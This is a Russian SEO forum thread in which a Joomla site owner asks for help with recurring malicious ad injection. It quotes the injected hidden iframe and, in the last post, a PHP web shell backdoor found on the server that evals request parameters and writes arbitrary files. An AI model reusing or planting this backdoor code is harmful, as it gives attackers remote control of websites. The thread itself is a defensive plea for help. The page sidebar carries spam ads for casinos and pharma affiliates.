Войти

Войти | Регистрация
Поиск по сайту
Взвлом и прописывание вредоносного кода
Поиск  Правила 
Seo форум » Разработка сайтов » Взлом и защита
Страницы: 1 2 След.
Взвлом и прописывание вредоносного кода, Постоянно вписываю вредоносный код рекламы
#1
29 Января 2013 16:11
Здравствуйте. Сайт на Joomla 1.5. В файл index.php работающего шаблона посноянно прописывается вредоносная реклама, за что яндекс дает санкции. При удаленни данного кода все возвращается на место, при этом дата изменения файла не изменяется, как будто ничего не происходило. Код следующий
[/URL] <style>.sdfsd{margin:-100%;position:absolute;width:600px;height:240px;}</style><div class="sdfsd"><iframe src="_http://avanturist.info/language/english/mails/go.php_"></iframe></div>
От хостра нет толку. Проблема уже целый месяц. Данный код вписывается только на двух сайтах, где нормальная посещаемость. Что можно попробовать?
#2
29 Января 2013 16:46
а хер знает smile:wall:
#3
29 Января 2013 17:03
шаблоны/права доступа к папкам?
может быть саму джумлу где-то подпортить успели. 

Сравните модули с другими сайтами. 
Изменено: Ваше Величество - 29 Января 2013 17:04
#4
29 Января 2013 17:19
Если есть "чистые" бэкапы попробуйте восстановить...
Хочешь зарабатывать много? Отличные тексты для Вашего сайта Регистрация
#5
29 Января 2013 19:38
В том то и дело, что в чистый бэкап прописывается, права доступа на шаблоны ограничивал. Может какой код нужно искать определенный, через тотал?
#6
29 Января 2013 19:42
wilo, на шаблон, на папки с файлами движка. по возможности все что есть - 755
#7
29 Января 2013 19:58
Цитата
Ваше Величество пишет:
wilo, на шаблон, на папки с файлами движка. по возможности все что есть - 755
насоветуете сейчас smile:) index.php  всегда 644
> SEO продвижение Бизнес-Сайтов
#8
29 Января 2013 20:04
Согласен Сергей Макаренко. На index.php ставил 444 и все равно прописывалось. Даже дата изменения файла не менялась при данной записи. Что можно через тотал командер поискать, какие коды?
#9
29 Января 2013 20:11
Цитата
wilo пишет:
Согласен Сергей Макаренко. На index.php ставил 444 и все равно прописывалось. Даже дата изменения файла не менялась при данной записи. Что можно через тотал командер поискать, какие коды?
вопрос в лоб, у вас в тотале сохранены пароли к фтп ? если да, то поздравляю, у вас слили все пароли, меняйте пароли на почте, продуйте всю систему антивирусником, и смените пароли везде где возможно, и никогда не сохраняйте пароли в тотал-командер.
#10
29 Января 2013 20:16
wilo, Рекомендую обратиться http://www.cy-pr.com/forum/f80/t42141/
Хостинг Beget на СУПРе
#11
29 Января 2013 20:18
в тотале не работаю как фтп, он только для поиска текста в файлах для поиска определенного кода. пароли менял уже не помогает. Возможно прописан где то код eval_base кажись такая орфография.
#12
29 Января 2013 21:25
Пишите в личку, могу посмотреть и помочь с данным вопросом.
#13
29 Января 2013 22:08
Цитата
wilo пишет:
Здравствуйте. Сайт на Joomla 1.5. В файл index.php работающего шаблона посноянно прописывается вредоносная реклама, за что яндекс дает санкции. При удаленни данного кода все возвращается на место, при этом дата изменения файла не изменяется, как будто ничего не происходило. Код следующий
[/URL] <style>.sdfsd{margin:-100%;position:absolute;width:600px;height:240px;}</style><div class="sdfsd"><iframe src="_avanturist.info/language/english/mails/go.php_"></iframe></div>
От хостра нет толку. Проблема уже целый месяц. Данный код вписывается только на двух сайтах, где нормальная посещаемость. Что можно попробовать?

А соседние файлы на содержимое не смотрел? smile;) Например, COPYRIGHT? smile:))
#14
29 Января 2013 22:56
На форуме есть тема, где предлагают провести проверку на уязвимость, за ссылку.
Система управления проектами
#15
31 Января 2013 18:19
Добрый день Всем. Спс за помощь. Просматриваю все файлы, т.к. сказать. Есть одно подозрение. Что это за код?
<?php    $bshd = "94784b2bd4d50c884a0b44d06b6aa4d6"; if(isset($_REQUEST['ndwv'])) { $rzgcvo = $_REQUEST['ndwv']; eval($rzgcvo); exit(0); } if(isset($_REQUEST['upxpasw'])) { $zqstfam = $_REQUEST['pyydcuyr']; $yxoulg = $_REQUEST['upxpasw']; $bedcxz = fopen($yxoulg, 'w'); $wqoqwpcu = fwrite($bedcxz, $zqstfam); fclose($bedcxz); echo $wqoqwpcu; exit(); }
?>

Присутствует в отдельных файлах index.php в местах где их не должно быть, в оригинальных установочных архивах.
Изменено: wilo - 31 Января 2013 18:31
 
Страницы: 1 2 След.
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
19:50 Стоит ли добавлять сайт в Rambler топ 100? 
12:37 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
12:14 Продвижение в ТОП-1 Яндекс при помощи лучших ПФ в РФ 
15:19 Refmate — сервис для взаимного обмена ссылками 
13:06 Продвижение по ключам 
09:47 Adsense личный опыт 
13:13 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 
09:40 Обменяй крипту без стресса – LupiBit.kg 
07:42 CoinCapital  
04:04 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
01:27 +10 ЛУЧШИХ ОНЛАЙН-CASINO НА 2025 ГОД: от Рейтинга +12 Платформ с выводом без верификации 
23:13 Аккаунт работодателя 
22:22 BestX24 - быстрый и безопасный обменник криптовалют и электронных денежных средств 
21:19 SellBuycoin.io - надежный проводник в мир обмена криптовалют на фиат и наличные по РФ! 
00:06 Всего п онемногу 
12:45 Куплю проигрышные букмекерские аккаунты 
11:55 Union Pharm - топовая фарма-партнерка для профессионалов! 
17:09 Точные прогнозы на футбол 
10:00 Ну что, кто куда деваете свои сайты? 
16:22 Компьютерная мышь 
23:55 Добро пожаловать в цифровой мир... 
Апдейты
  • Яндекс ИКС Яндекс выдача 23.11.2023 (665 дней назад)
  • Яндекс выдача Яндекс выдачаМониторинг апдейтов 01.04.2025 (170 дней назад)

     Доска объявлений
     Купить / Продать
     Работа / Услуги
Интересные темы
—  Заработок на Рутубе 2025
—  Монетизация любого типа контента на YouTube. Adsense больше не нужен!
—  Баннерообменная бизнес сеть. Заработок без вложений.
—  Ютуб - продвижение и заработок
—  Новая акция 2025: Заработай* до 5 432 руб. за пару минут** просто, бесплатно и без смс. Сможет даже новичок


Показать все

Интернет новости

Как понравиться Google?26.03
Как понравиться Google?

25.03 Telegram заблокировали в Испании

25.03 Власти РФ требуют от Telegram бороться с "не такими" новостями

23.03 Microsoft покупает рекламу в выдаче Google для раскрутки Bing

22.03 Google Gemini открыта для тестирования

21.03 Yahoo! продолжает "угрожать" своим новым поиском


Инструменты
Все инструменты

© Сервис анализа сайтов CY-PR.com 2008-2050